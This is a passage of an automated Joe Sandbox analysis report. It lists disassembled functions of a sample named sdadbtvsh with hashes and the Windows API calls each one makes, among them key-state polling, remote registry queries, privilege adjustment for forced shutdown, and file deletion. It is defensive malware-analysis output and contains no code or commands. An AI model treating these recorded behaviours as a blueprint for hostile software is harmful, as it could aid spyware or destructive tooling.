                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock
                                                                                              • String ID:
                                                                                              • API String ID: 2638373210-0
                                                                                              • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                              • Instruction ID: 4221b363127db15aab33f8cd985eea67609a366441a953173fddd51a9339608c
                                                                                              • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                              • Instruction Fuzzy Hash: 2DF0D47140020DBBDF05DF94C946AAE7FA9FB44318F208445F9159A251D336EA21EBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 176396367-0
                                                                                              • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                                                              • Instruction ID: 29be5859b39deca6892ec0b7bdb9000f4ff98326f279fd38f67df0d0c7b5cf4d
                                                                                              • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                                                              • Instruction Fuzzy Hash: 1AD052223424212AAA69213D2D0FCBF8E1CDBC2AA0B14403EFA02CA1AAE9445C0304A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 005FE7A2
                                                                                                • Part of subcall function 005984B7: _wcslen.LIBCMT ref: 005984CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: NamePathShort_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2021730007-0
                                                                                              • Opcode ID: ebe34213782033203345c0184df953fe04d7753eb1035c60a298a992acf569c7
                                                                                              • Instruction ID: 155ef7eb1d899f283d1fbaf01e8afb1f8df27444a3545e603fa6cafc0ff92d6f
                                                                                              • Opcode Fuzzy Hash: ebe34213782033203345c0184df953fe04d7753eb1035c60a298a992acf569c7
                                                                                              • Instruction Fuzzy Hash: 92E0CD7650022557CB2092589C09FEA77DDEFC8790F040071FD09D7248DD64DD808690
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005939FD
                                                                                                • Part of subcall function 005984B7: _wcslen.LIBCMT ref: 005984CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongNamePath_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 541455249-0
                                                                                              • Opcode ID: 8a7f8cb5d0880cb51d823aa642649a03968641df6fd35677f71bc6071cb593d1
                                                                                              • Instruction ID: f999b575616792583f3be06921d41bf6bfe01c7edff03cff0e46d734c4f6db41
                                                                                              • Opcode Fuzzy Hash: 8a7f8cb5d0880cb51d823aa642649a03968641df6fd35677f71bc6071cb593d1
                                                                                              • Instruction Fuzzy Hash: E6E0CD7650012557CB2092589C09FEA77DDEFC8790F040071FD09D7248DD64DD808690
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 005FE76C
                                                                                                • Part of subcall function 005984B7: _wcslen.LIBCMT ref: 005984CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderPath_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2987691875-0
                                                                                              • Opcode ID: 81b11b783f3352e36b0c8e5b51f23f2748dbdb530dfcfdc509b95526fc1877b8
                                                                                              • Instruction ID: a5dfb261a55afabca54de5c43153042d4d8de4d1a866978bf207adca49220616
                                                                                              • Opcode Fuzzy Hash: 81b11b783f3352e36b0c8e5b51f23f2748dbdb530dfcfdc509b95526fc1877b8
                                                                                              • Instruction Fuzzy Hash: 40D05EA19002292BDF60A6749C0DDBB3AACDB80214F0006A0786DD3182E934ED4586A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,00000000,005D3A1C), ref: 00597973
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseFindNotification
                                                                                              • String ID:
                                                                                              • API String ID: 2591292051-0
                                                                                              • Opcode ID: 336d193bbd1ff1aefb37fc3b3914bd90777447b1dd4fe04d4ceee2b47f7da026
                                                                                              • Instruction ID: 0476dd64918f4d097f972ccb7a07d64a2a83061c38da96081d244eab0cd5870c
                                                                                              • Opcode Fuzzy Hash: 336d193bbd1ff1aefb37fc3b3914bd90777447b1dd4fe04d4ceee2b47f7da026
                                                                                              • Instruction Fuzzy Hash: D5E0B675414B12CFC7314F1AE804412FBF4FFD63613204A2FD4E582660D3B05886CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,005FD9DC,?,?), ref: 005FDA72
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CopyFile
                                                                                              • String ID:
                                                                                              • API String ID: 1304948518-0
                                                                                              • Opcode ID: d69decf29016655abe227a87ba5726e5d5263a74325412ef05959b4ca6c3fcce
                                                                                              • Instruction ID: 758489187a3a654e71a70d2e62dab295b4d8cd9bc8d3be7cc492bf1ed62d22d0
                                                                                              • Opcode Fuzzy Hash: d69decf29016655abe227a87ba5726e5d5263a74325412ef05959b4ca6c3fcce
                                                                                              • Instruction Fuzzy Hash: B8D0A7305D0208FBEF108B50CC03F99B76CE701B45F105194B201EA0D0C7B5A609A724
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,00000000,?,005D0AA4,?,?,00000000,?,005D0AA4,00000000,0000000C), ref: 005D0757
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: e6961cbb006f2604823bbf5453935b50ce67805648589ac71513a5532032cf1b
                                                                                              • Instruction ID: 2232d925885301a60879c15e3cf6440ec39afbc67399a0a7c8bb037ae834f152
                                                                                              • Opcode Fuzzy Hash: e6961cbb006f2604823bbf5453935b50ce67805648589ac71513a5532032cf1b
                                                                                              • Instruction Fuzzy Hash: E2D06C3200010DBBDF128F84DD06EDA3BAAFB48714F014000BE1856020C732E832AB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,005FD755), ref: 005FE9C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 5d36e81d81308941d681f948049c5317627bee6967f5fa1b6bbe4ca3059edb80
                                                                                              • Instruction ID: f2a3b188526865c07606874141380629757b81bd883e9425ad51f25e2459a401
                                                                                              • Opcode Fuzzy Hash: 5d36e81d81308941d681f948049c5317627bee6967f5fa1b6bbe4ca3059edb80
                                                                                              • Instruction Fuzzy Hash: 0FB09224001A1845BE780A381B1A0B92B0178533E67E82B95E6F9952F6C37D880BE620
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005FDB69: FindFirstFileW.KERNELBASE(?,?), ref: 005FDBE0
                                                                                                • Part of subcall function 005FDB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 005FDC30
                                                                                                • Part of subcall function 005FDB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 005FDC41
                                                                                                • Part of subcall function 005FDB69: FindClose.KERNEL32(00000000), ref: 005FDC58
                                                                                              • GetLastError.KERNEL32 ref: 00606583
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                              • String ID:
                                                                                              • API String ID: 2191629493-0
                                                                                              • Opcode ID: f4936595e35d776a6833b403cb8c0f46c831b6ccfb867ef14d319cc0e527e348
                                                                                              • Instruction ID: f96e94a57a0ba937ecfd073a663205acdde3bf4277708bae4e299dcbdb2d1eb1
                                                                                              • Opcode Fuzzy Hash: f4936595e35d776a6833b403cb8c0f46c831b6ccfb867ef14d319cc0e527e348
                                                                                              • Instruction Fuzzy Hash: 8FF082312005058FCF14EF59D859B6ABBE9BF89320F048049F94587351CB74BC018B94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0060A11B
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0060A176
                                                                                              • FindClose.KERNEL32(00000000), ref: 0060A181
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0060A19D
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0060A1ED
                                                                                              • SetCurrentDirectoryW.KERNEL32(00657B94), ref: 0060A20B
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0060A215
                                                                                              • FindClose.KERNEL32(00000000), ref: 0060A222
                                                                                              • FindClose.KERNEL32(00000000), ref: 0060A232
                                                                                                • Part of subcall function 005FE2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 005FE2C9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                              • String ID: *.*
                                                                                              • API String ID: 2640511053-438819550
                                                                                              • Opcode ID: 862eec6fd6feb59d2d70b289060c5b9267d15765f49734c6d21e71e994cf47b6
                                                                                              • Instruction ID: d95b6bdb02d0744e899dbafd24099835859499f19f097c8934e8f3d36cc9b307
                                                                                              • Opcode Fuzzy Hash: 862eec6fd6feb59d2d70b289060c5b9267d15765f49734c6d21e71e994cf47b6
                                                                                              • Instruction Fuzzy Hash: 9831163124171E6ACB28AFE4EC09ADF77AEAF553A0F1401A1E810A22D1EB31DF45CA51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0061D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0061C00D,?,?), ref: 0061D314
                                                                                                • Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D350
                                                                                                • Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D3C7
                                                                                                • Part of subcall function 0061D2F7: _wcslen.LIBCMT ref: 0061D3FD
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061C89D
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0061C908
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0061C92C
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0061C98B
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0061CA46
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0061CAB3
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0061CB48
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0061CB99
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0061CC42
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0061CCE1
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0061CCEE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                              • String ID:
                                                                                              • API String ID: 3102970594-0
                                                                                              • Opcode ID: 85c151085c3275e6802e5d043fa2f69ba56bf997ebdca439450a5a14760f6a61
                                                                                              • Instruction ID: 5d49ef80088895d1092543c34aa168e48a5744be3eec27b83deb78339868c45e
                                                                                              • Opcode Fuzzy Hash: 85c151085c3275e6802e5d043fa2f69ba56bf997ebdca439450a5a14760f6a61
                                                                                              • Instruction Fuzzy Hash: 93023E716042419FDB14DF24C895E6ABBE6FF88318F18849DE449CB3A2DB31ED46CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 005FA572
                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 005FA5F3
                                                                                              • GetKeyState.USER32(000000A0), ref: 005FA60E
                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 005FA628
                                                                                              • GetKeyState.USER32(000000A1), ref: 005FA63D
                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 005FA655
                                                                                              • GetKeyState.USER32(00000011), ref: 005FA667
                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 005FA67F
                                                                                              • GetKeyState.USER32(00000012), ref: 005FA691
                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 005FA6A9
                                                                                              • GetKeyState.USER32(0000005B), ref: 005FA6BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: State$Async$Keyboard
                                                                                              • String ID:
                                                                                              • API String ID: 541375521-0
                                                                                              • Opcode ID: ada0ec1f720ab95a73cebccba20b36cbff8b2d0d1acf25e41aedc4d593135f39
                                                                                              • Instruction ID: 54a8746655b4091760ec259134779e8219ad1e3d7acbd322d20701576052f4a1
                                                                                              • Opcode Fuzzy Hash: ada0ec1f720ab95a73cebccba20b36cbff8b2d0d1acf25e41aedc4d593135f39
                                                                                              • Instruction Fuzzy Hash: B54195B49047CD6EFF31576084143B5BEA17F15344F088059DBCA9A5C2DBEC99C48B53
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CoInitialize.OLE32 ref: 006140D1
                                                                                              • CoUninitialize.OLE32 ref: 006140DC
                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00630B44,?), ref: 00614136
                                                                                              • IIDFromString.OLE32(?,?), ref: 006141A9
                                                                                              • VariantInit.OLEAUT32(?), ref: 00614241
                                                                                              • VariantClear.OLEAUT32(?), ref: 00614293
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                              • API String ID: 636576611-1287834457
                                                                                              • Opcode ID: ff2357208eaf67ebead46359dd52e9a87e312ff1d9aed6a1a391a44841a46114
                                                                                              • Instruction ID: 305148e42f4df663179cabc876bc8323d2b55301fccaaa2e7cccad6048ff435f
                                                                                              • Opcode Fuzzy Hash: ff2357208eaf67ebead46359dd52e9a87e312ff1d9aed6a1a391a44841a46114
                                                                                              • Instruction Fuzzy Hash: FB61A171204701AFD710DF64D849BAABBEAFF89754F080409F9819B291DB70EDC9CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005F1F53: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005F1F9D
                                                                                                • Part of subcall function 005F1F53: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005F1FCA
                                                                                                • Part of subcall function 005F1F53: GetLastError.KERNEL32 ref: 005F1FDA
                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 005FF15E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                              • String ID: $ $@$SeShutdownPrivilege
                                                                                              • API String ID: 2234035333-3163812486
                                                                                              • Opcode ID: 9f5e02107faff94d2fc69db14c86aa71884c8fe9eb578438bc9660a1fc32e38e
                                                                                              • Instruction ID: 4ec96522da405164ef9b4b2d7f7167dbff96eb9fb0f200870d8923b4b5b6f05d
                                                                                              • Opcode Fuzzy Hash: 9f5e02107faff94d2fc69db14c86aa71884c8fe9eb578438bc9660a1fc32e38e
                                                                                              • Instruction Fuzzy Hash: 8A01D672610219EBE73426B8EC89FBF7A6DBF08390F150831FF02E20D1D6684D04C2A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269
                                                                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0060A4D5
                                                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0060A5E8
                                                                                                • Part of subcall function 006041CE: GetInputState.USER32 ref: 00604225
                                                                                                • Part of subcall function 006041CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006042C0
                                                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0060A505
                                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0060A5D2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
